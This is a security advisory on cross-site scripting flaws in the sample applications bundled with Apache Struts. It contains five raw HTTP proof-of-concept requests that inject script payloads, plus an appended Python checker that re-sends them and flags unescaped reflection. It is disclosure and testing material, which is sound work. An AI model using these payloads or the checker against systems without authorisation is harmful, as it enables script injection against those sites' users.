
Apache Struts 1.3.10 / 2.0.14 / 2.2.3 Cross Site Scripting
Posted Feb 3, 2012
Authored by Antu Sanadi | Site secpod.com

Apache Struts versions 1.3.10, 2.0.14 and 2.2.3 suffer from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | d9fa78ab565ffc78f9b758171aa45c73f075a712e2b675fb27d4d85d6afd0004

##############################################################################
#
# Title : Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
# Author : Antu Sanadi SecPod Technologies (www.secpod.com)
# Vendor : http://struts.apache.org/
# Advisory : http://secpod.org/blog/?p=450
# http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt
# Software : Apache struts 1.3.10, 2.0.14 and 2.2.3
# Date : 01/02/2012
#
##############################################################################

SecPod ID: 1021

21/07/2011 Issue Discovered
03/08/2011 Vendor Notified
           No Response
01/02/2012 Advisory Released

Class: Cross-Site Scripting (Persistent and Reflected)
Severity: High


Overview:
---------
Multiple persistent and reflected cross-site scripting vulnerabilities in the
sample web applications shipped with Apache Struts.


Technical Description:
----------------------
Multiple persistent and reflected cross-site scripting vulnerabilities are
present in the sample web applications distributed with Apache Struts
(struts2-showcase, struts2-rest-showcase, struts-examples and
struts-cookbook), which return user-supplied input to the browser without
HTML-encoding it.

i) Input passed via the 'name' and 'lastName' parameters in
'/struts2-showcase/person/editPerson.action' is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.

ii) Input passed via the 'clientName' parameter in
'/struts2-rest-showcase/orders' action is not properly verified before
it is returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in the context of a
vulnerable site.

iii) Input passed via the 'name' parameter in
'/struts-examples/upload/upload-submit.do?queryParam=Successful' action
is not properly verified before it is returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in the context of a vulnerable site.

iv) Input passed via the 'message' parameter in
'/struts-cookbook/processSimple.do' action is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.

v) Input passed via the 'message' parameter in
'/struts-cookbook/processDyna.do' action is not properly verified before
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.

These vulnerabilities have been tested on Apache Struts2 v2.2.3,
Apache Struts2 v2.0.14 and Apache Struts v1.3.10.
Other versions may also be affected.


Impact:
--------
Successful exploitation allows an attacker to execute arbitrary HTML and
script code in a user's browser session in the context of the vulnerable
application. In the stored cases (struts2-showcase and struts2-rest-showcase)
the payload is saved by the application and served to every user who later
views the affected page; in the reflected cases the victim must be made to
submit the crafted request.


Affected Software:
------------------
Apache Struts 2.2.3 and prior.

Tested on,
i) Apache Struts 2.2.3 - Stored XSS
- struts2-showcase-2.2.3
- struts2-rest-showcase-2.2.3

ii) Apache Struts 2.0.14 - Stored XSS
- struts2-showcase-2.0.14

iii) Apache Struts 1.3.10 - Reflected XSS
- struts-cookbook-1.3.10
- struts-examples-1.3.10


References:
-----------
http://struts.apache.org
http://secpod.org/blog/?p=450


Proof of Concept:
-----------------

POC 1:
-----
Stored XSS

POST /struts2-showcase/person/editPerson.action HTTP/1.1

Host: SERVER_IP:8080
User-Agent: struts2-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

Post Data:
----------
persons%281%29.name=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&persons%281%29.lastName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&method%3Asave=Save+all+persons


POC 2:
-----
Stored XSS

POST /struts2-rest-showcase/orders HTTP/1.1

Host: SERVER_IP:8080
User-Agent: struts2-rest-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

Post Data:
----------
clientName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&amount=


POC 3:
-----
Reflected XSS

POST /struts-examples/upload/upload-submit.do?queryParam=Successful HTTP/1.1

Host: SERVER_IP:8080
User-Agent: Struts-examples XSS-TEST
Content-Type: multipart/form-data; boundary=---------------------------41701161044225432961947041
Content-Length: 481

Post Data:
----------
-----------------------------41701161044225432961947041\r\n
Content-Disposition: form-data; name="theText"\r\n
\r\n
<script>alert("SecPod-XSS-TEST")</script>\r\n
-----------------------------41701161044225432961947041\r\n
Content-Disposition: form-data; name="theFile"; filename=""\r\n
Content-Type: application/octet-stream\r\n
\r\n
\r\n
-----------------------------41701161044225432961947041\r\n
Content-Disposition: form-data; name="filePath"\r\n
\r\n
\r\n
-----------------------------41701161044225432961947041--\r\n


POC 4:
-----
Reflected XSS

POST /struts-cookbook/processSimple.do HTTP/1.1

Host: SERVER_IP:8080
User-Agent: Struts-cookbook XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

Post Data:
----------
name=XYZ&secret=XYZ&color=red&confirm=on&rating=1&message=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&


POC 5:
-----
Reflected XSS

POST /struts-cookbook/processDyna.do HTTP/1.1

Host: SERVER_IP:8080
User-Agent: Struts-cookbook XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

Post Data:
----------
name=ZYZ&secret=&color=red&message=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&
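
The five proofs of concept above, re-sent by a small checker. This is an added
example and is not part of the SecPod advisory: it rebuilds each PoC body from
the advisory's parameter names and payload, POSTs it, and reports whether the
raw payload comes back unescaped. The target host (the advisory's SERVER_IP:8080
placeholder), the multipart boundary and the User-Agent string are assumptions;
the paths, field names and payload are taken from the PoCs.

```python
import sys
import urllib.parse
import urllib.request

# Payload used throughout the advisory's proofs of concept.
PAYLOAD = '<script>alert("SecPod-XSS-TEST")</script>'

# (path, form fields, multipart?) for PoC 1..5, in the advisory's order.
POCS = [
    ("/struts2-showcase/person/editPerson.action",
     {"persons(1).name": PAYLOAD, "persons(1).lastName": PAYLOAD,
      "method:save": "Save all persons"}, False),
    ("/struts2-rest-showcase/orders",
     {"clientName": PAYLOAD, "amount": ""}, False),
    ("/struts-examples/upload/upload-submit.do?queryParam=Successful",
     {"theText": PAYLOAD, "theFile": "", "filePath": ""}, True),
    ("/struts-cookbook/processSimple.do",
     {"name": "XYZ", "secret": "XYZ", "color": "red", "confirm": "on",
      "rating": "1", "message": PAYLOAD}, False),
    ("/struts-cookbook/processDyna.do",
     {"name": "ZYZ", "secret": "", "color": "red", "message": PAYLOAD}, False),
]


def encode_form(fields):
    """application/x-www-form-urlencoded body. Reproduces the advisory's
    'Post Data' strings (e.g. persons(1).name -> persons%281%29.name)."""
    return urllib.parse.urlencode(fields)


def encode_multipart(fields, boundary):
    """multipart/form-data body with CRLF line ends, laid out like PoC 3:
    'theFile' is sent as an empty file part, every other field as text."""
    lines = []
    for name, value in fields.items():
        lines.append("--" + boundary)
        if name == "theFile":
            lines.append('Content-Disposition: form-data; name="theFile"; filename=""')
            lines.append("Content-Type: application/octet-stream")
        else:
            lines.append('Content-Disposition: form-data; name="%s"' % name)
        lines.append("")
        lines.append(value)
    lines.append("--" + boundary + "--")
    lines.append("")
    return "\r\n".join(lines)


def reflected_unescaped(body, payload=PAYLOAD):
    """True if the raw payload appears in the response body. A correctly
    HTML-encoded echo (&lt;script&gt;...) does not match, so a hardened
    page reports False even though it still displays the submitted text."""
    return payload in body


def check_poc(base_url, path, fields, multipart, timeout=5):
    """POST one PoC and test the final response. urllib follows redirects,
    so for the stored cases the check covers the page the save action
    redirects to, if it redirects at all; otherwise fetch the listing page
    yourself. Network call: only run against hosts you are authorised to test."""
    if multipart:
        boundary = "SecPodXssCheckBoundary"  # arbitrary value, not from the advisory
        data = encode_multipart(fields, boundary).encode()
        ctype = "multipart/form-data; boundary=" + boundary
    else:
        data = encode_form(fields).encode()
        ctype = "application/x-www-form-urlencoded"
    req = urllib.request.Request(
        base_url + path, data=data, method="POST",
        headers={"Content-Type": ctype, "User-Agent": "struts XSS-TEST"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return reflected_unescaped(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # Usage: python struts_xss_check.py http://SERVER_IP:8080
    base = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080"
    for path, fields, multipart in POCS:
        try:
            verdict = "VULNERABLE" if check_poc(base, path, fields, multipart) else "not reflected"
        except Exception as exc:  # connection refused, HTTP 4xx/5xx, timeout
            verdict = "error: %s" % exc
        print("%-62s %s" % (path, verdict))
```

The decision is deliberately strict: only the byte-for-byte payload counts, so a
page that encodes `<` and `"` before output is reported as not reflected even
though the text is still visible, which is exactly the behaviour a fix should have.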


Solution:
---------
Fix not available at the time of release. Every affected endpoint belongs to
the showcase, examples and cookbook sample applications distributed with
Struts, not to the framework core: do not deploy these sample applications on
production or Internet-facing servers, and remove them where they are present.


Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = LOW
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = PARTIAL
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 6.4 (High) (AV:N/AC:L/Au:N/C:P/I:P/A:N)

Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of these
vulnerabilities.
